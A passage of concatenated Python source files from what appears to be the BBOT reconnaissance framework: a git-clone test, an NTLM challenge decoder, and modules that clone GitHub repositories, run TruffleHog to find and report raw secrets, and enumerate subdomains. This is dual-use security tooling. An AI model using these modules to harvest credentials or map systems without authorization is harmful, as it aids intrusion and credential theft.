                    "compare_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/compare/{base}...{head}",
                    "merges_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/merges",
                    "archive_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/{archive_format}{/ref}",
                    "downloads_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/downloads",
                    "issues_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/issues{/number}",
                    "pulls_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/pulls{/number}",
                    "milestones_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/milestones{/number}",
                    "notifications_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/notifications{?since,all,participating}",
                    "labels_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/labels{/name}",
                    "releases_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/releases{/id}",
                    "deployments_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/deployments",
                    "created_at": "2022-02-15T23:10:51Z",
                    "updated_at": "2023-09-02T12:20:13Z",
                    "pushed_at": "2023-10-19T02:56:46Z",
                    "git_url": "git://github.com/blacklanternsecurity/test_keys.git",
                    "ssh_url": "git@github.com:blacklanternsecurity/test_keys.git",
                    "clone_url": "https://github.com/blacklanternsecurity/test_keys.git",
                    "svn_url": "https://github.com/blacklanternsecurity/test_keys",
                    "homepage": None,
                    "size": 2,
                    "stargazers_count": 2,
                    "watchers_count": 2,
                    "language": None,
                    "has_issues": True,
                    "has_projects": True,
                    "has_downloads": True,
                    "has_wiki": True,
                    "has_pages": False,
                    "has_discussions": False,
                    "forks_count": 32,
                    "mirror_url": None,
                    "archived": False,
                    "disabled": False,
                    "open_issues_count": 2,
                    "license": None,
                    "allow_forking": True,
                    "is_template": False,
                    "web_commit_signoff_required": False,
                    "topics": [],
                    "visibility": "public",
                    "forks": 32,
                    "open_issues": 2,
                    "watchers": 2,
                    "default_branch": "main",
                    "permissions": {"admin": False, "maintain": False, "push": False, "triage": False, "pull": True},
                }
            ],
        )

    async def setup_after_prep(self, module_test):
        temp_path = Path("/tmp/.bbot_test")
        subprocess.run(["git", "init", "test_keys"], cwd=temp_path)
        temp_repo_path = temp_path / "test_keys"
        with open(temp_repo_path / "keys.txt", "w") as f:
            f.write(self.file_content)
        subprocess.run(["git", "add", "."], cwd=temp_repo_path)
        subprocess.run(
            [
                "git",
                "-c",
                "user.name='BBOT Test'",
                "-c",
                "user.email='bbot@blacklanternsecurity.com'",
                "commit",
                "-m",
                "Initial commit",
            ],
            check=True,
            cwd=temp_repo_path,
        )

        old_filter_event = module_test.module.filter_event

        def new_filter_event(event):
            event.data["url"] = event.data["url"].replace(
                "https://github.com/blacklanternsecurity", f"file://{temp_path}"
            )
            return old_filter_event(event)

        module_test.monkeypatch.setattr(module_test.module, "filter_event", new_filter_event)

    def check(self, module_test, events):
        filesystem_events = [
            e
            for e in events
            if e.type == "FILESYSTEM"
            and "git_repos/test_keys" in e.data["path"]
            and "git" in e.tags
            and e.scope_distance == 1
        ]
        assert 1 == len(filesystem_events), "Failed to git clone CODE_REPOSITORY"
        filesystem_event = filesystem_events[0]
        folder = Path(filesystem_event.data["path"])
        assert folder.is_dir(), "Destination folder doesn't exist"
        with open(folder / "keys.txt") as f:
            content = f.read()
            assert content == self.file_content, "File content doesn't match"



import re
from pathlib import Path
from bbot.core.helpers.modules import module_loader

dir_regex = re.compile(r"^[a-z][a-z0-9_]*$")

parent_dir = Path(__file__).parent.resolve()
module_dirs = set([parent_dir])
for e in parent_dir.iterdir():
    if e.is_dir() and dir_regex.match(e.name) and not e.name == "modules":
        module_dirs.add(e)

for d in module_dirs:
    module_loader.preload(d)



# Stolen from https://github.com/blacklanternsecurity/TREVORspray who stole it from https://github.com/byt3bl33d3r/SprayingToolkit/blob/master/core/utils/ntlmdecoder.py

import base64
import struct
import logging
import collections

from bbot.core.errors import NTLMError

log = logging.getLogger("bbot.core.helpers.ntlm")


class StrStruct(object):
    def __init__(self, pos_tup, raw):
        length, alloc, offset = pos_tup
        self.length = length
        self.alloc = alloc
        self.offset = offset
        self.raw = raw[offset : offset + length]
        self.utf16 = False

        if len(self.raw) >= 2 and self.raw[1] == "\0":
            self.string = self.raw.decode("utf-16")
            self.utf16 = True
        else:
            self.string = self.raw


target_field_types = collections.defaultdict(lambda: "UNKNOWN")
target_field_types[0] = "TERMINATOR"
target_field_types[1] = "NetBIOS_Computer_Name"
target_field_types[2] = "NetBIOS_Domain_Name"
target_field_types[3] = "FQDN"
target_field_types[4] = "DNS_Domain_name"
target_field_types[5] = "DNS_Tree_Name"
target_field_types[7] = "Timestamp"


def decode_ntlm_challenge(st):
    hdr_tup = struct.unpack("<hhiiQ", st[12:32])
    parsed_challenge = {}

    nxt = st[40:48]
    if len(nxt) == 8:
        hdr_tup = struct.unpack("<hhi", nxt)
        tgt = StrStruct(hdr_tup, st)

        output = "Target: [block] (%db @%d)" % (tgt.length, tgt.offset)
        if tgt.alloc != tgt.length:
            output += " alloc: %d" % tgt.alloc

        raw = tgt.raw
        pos = 0

        while pos + 4 < len(raw):
            rec_hdr = struct.unpack("<hh", raw[pos : pos + 4])
            rec_type_id = rec_hdr[0]
            rec_type = target_field_types[rec_type_id]
            rec_sz = rec_hdr[1]
            subst = raw[pos + 4 : pos + 4 + rec_sz]
            try:
                parsed_challenge[rec_type] = subst.replace(b"\x00", b"").decode()
            except UnicodeDecodeError:
                parsed_challenge[rec_type] = subst.replace(b"\x00", b"")
            pos += 4 + rec_sz

    return parsed_challenge


def ntlmdecode(authenticate_header):
    try:
        st = base64.b64decode(authenticate_header)
    except Exception:
        raise NTLMError(f"Failed to decode NTLM challenge: {authenticate_header}")

    if not st[:8] == b"NTLMSSP\x00":
        raise NTLMError("NTLMSSP header not found at start of input string")

    try:
        return decode_ntlm_challenge(st)
    except Exception as e:
        raise NTLMError(f"Failed to parse NTLM challenge: {authenticate_header}: {e}")



from pathlib import Path
from bbot.modules.templates.github import github


class git_clone(github):
    watched_events = ["CODE_REPOSITORY"]
    produced_events = ["FILESYSTEM"]
    flags = ["passive", "safe", "slow"]
    meta = {"description": "Clone code github repositories"}
    options = {"api_key": "", "output_folder": ""}
    options_desc = {"api_key": "Github token", "output_folder": "Folder to clone repositories to"}

    deps_apt = ["git"]

    scope_distance_modifier = 2

    async def setup(self):
        output_folder = self.config.get("output_folder")
        if output_folder:
            self.output_dir = Path(output_folder) / "git_repos"
        else:
            self.output_dir = self.scan.home / "git_repos"
        self.helpers.mkdir(self.output_dir)
        return await super().setup()

    async def filter_event(self, event):
        if event.type == "CODE_REPOSITORY":
            if "git" not in event.tags:
                return False, "event is not a git repository"
        return True

    async def handle_event(self, event):
        repo_url = event.data.get("url")
        repo_path = await self.clone_git_repository(repo_url)
        if repo_path:
            self.verbose(f"Cloned {repo_url} to {repo_path}")
            codebase_event = self.make_event(
                {"path": str(repo_path)}, "FILESYSTEM", tags=["git", "folder"], source=event
            )
            codebase_event.scope_distance = event.scope_distance
            await self.emit_event(codebase_event)

    async def clone_git_repository(self, repository_url):
        if self.api_key:
            url = repository_url.replace("https://github.com", f"https://user:{self.api_key}@github.com")
        else:
            url = repository_url
        command = ["git", "-C", self.output_dir, "clone", url]
        output = await self.run_process(command)
        if output.returncode == 0:
            folder_name = output.stderr.split("Cloning into '")[1].split("'")[0]
            return self.output_dir / folder_name
        else:
            return None



import json
from bbot.modules.base import BaseModule


class trufflehog(BaseModule):
    watched_events = ["FILESYSTEM"]
    produced_events = ["FINDING", "VULNERABILITY"]
    flags = ["passive", "safe"]
    meta = {"description": "TruffleHog is a tool for finding credentials"}

    options = {
        "version": "3.69.0",
        "only_verified": True,
        "concurrency": 8,
    }
    options_desc = {
        "version": "trufflehog version",
        "only_verified": "Only report credentials that have been verified",
        "concurrency": "Number of concurrent workers",
    }
    deps_ansible = [
        {
            "name": "Download trufflehog",
            "unarchive": {
                "src": "https://github.com/trufflesecurity/trufflehog/releases/download/v#{BBOT_MODULES_TRUFFLEHOG_VERSION}/trufflehog_#{BBOT_MODULES_TRUFFLEHOG_VERSION}_#{BBOT_OS}_#{BBOT_CPU_ARCH}.tar.gz",
                "include": "trufflehog",
                "dest": "#{BBOT_TOOLS}",
                "remote_src": True,
            },
        }
    ]

    scope_distance_modifier = 2

    async def setup(self):
        self.verified = self.config.get("only_verified", True)
        self.concurrency = int(self.config.get("concurrency", 8))
        return True

    async def filter_event(self, event):
        if event.type == "FILESYSTEM":
            if "git" not in event.tags and "docker" not in event.tags:
                return False, "event is not a git repository or a docker image"
        return True

    async def handle_event(self, event):
        path = event.data["path"]
        if "git" in event.tags:
            module = "git"
        elif "docker" in event.tags:
            module = "docker"
        async for decoder_name, detector_name, raw_result, verified, source_metadata in self.execute_trufflehog(
            module, path
        ):
            if verified:
                data = {
                    "severity": "High",
                    "description": f"Verified Secret Found. Detector Type: [{detector_name}] Decoder Type: [{decoder_name}] Secret: [{raw_result}] Details: [{source_metadata}]",
                    "host": str(event.source.host),
                }
                await self.emit_event(data, "VULNERABILITY", event)
            else:
                data = {
                    "description": f"Potential Secret Found. Detector Type: [{detector_name}] Decoder Type: [{decoder_name}] Secret: [{raw_result}] Details: [{source_metadata}]",
                    "host": str(event.source.host),
                }
                await self.emit_event(data, "FINDING", event)

    async def execute_trufflehog(self, module, path):
        command = [
            "trufflehog",
            "--json",
        ]
        if self.verified:
            command.append("--only_verified")
        command.append("--concurrency=" + str(self.concurrency))
        if module == "git":
            command.append("git")
            command.append("file://" + path)
        elif module == "docker":
            command.append("docker")
            command.append("--image=file://" + path)

        stats_file = self.helpers.tempfile_tail(callback=self.log_trufflehog_status)
        try:
            with open(stats_file, "w") as stats_fh:
                async for line in self.helpers.run_live(command, stderr=stats_fh):
                    try:
                        j = json.loads(line)
                    except json.decoder.JSONDecodeError:
                        self.debug(f"Failed to decode line: {line}")
                        continue

                    decoder_name = j.get("DecoderName", "")

                    detector_name = j.get("DetectorName", "")

                    raw_result = j.get("Raw", "")

                    verified = j.get("Verified", False)

                    source_metadata = j.get("SourceMetadata", {})

                    yield (decoder_name, detector_name, raw_result, verified, source_metadata)
        finally:
            stats_file.unlink()

    def log_trufflehog_status(self, line):
        try:
            line = json.loads(line)
        except Exception:
            self.info(str(line))
            return
        message = line.get("msg", "")
        ts = line.get("ts", "")
        status = f"Message: {message} | Timestamp: {ts}"
        self.info(status)



from bbot.modules.templates.subdomain_enum import subdomain_enum


class anubisdb(subdomain_enum):
    flags = ["subdomain-enum", "passive", "safe"]
    watched_events = ["DNS_NAME"]
    produced_events = ["DNS_NAME"]
    meta = {"description": "Query jldc.me's database for subdomains"}
    options = {"limit": 1000}
    options_desc = {
        "limit": "Limit the number of subdomains returned per query (increasing this may slow the scan due to garbage results from this API)"
    }

    base_url = "https://jldc.me/anubis/subdomains"
    dns_abort_depth = 5

    async def request_url(self, query):
        url = f"{self.base_url}/{self.helpers.quote(query)}"
        return await self.request_with_fail_count(url)

    def abort_if_pre(self, hostname):
        """
        Discards results that are longer than 5 segments, e.g. a.b.c.d.evilcorp.com
        This exists because of the _disgusting_ amount of garbage data in this API
        """
        dns_depth = hostname.count(".") + 1
        if dns_depth > self.dns_abort_depth:
            return True
        return False

    async def abort_if(self, event):
        # abort if dns name is unresolved
        if not "resolved" in event.tags:
            return True, "DNS name is unresolved"
        return await super().abort_if(event)

    def parse_results(self, r, query):
        results = set()
        json = r.json()
        if json:
            for hostname in json:
                hostname = str(hostname).lower()
                in_scope = hostname.endswith(f".{query}")
                is_ptr = self.helpers.is_ptr(hostname)
                too_long = self.abort_if_pre(hostname)
                if in_scope and not is_ptr and not too_long:
                    results.add(hostname)
        return sorted(results)[: self.config.get("limit", 1000)]
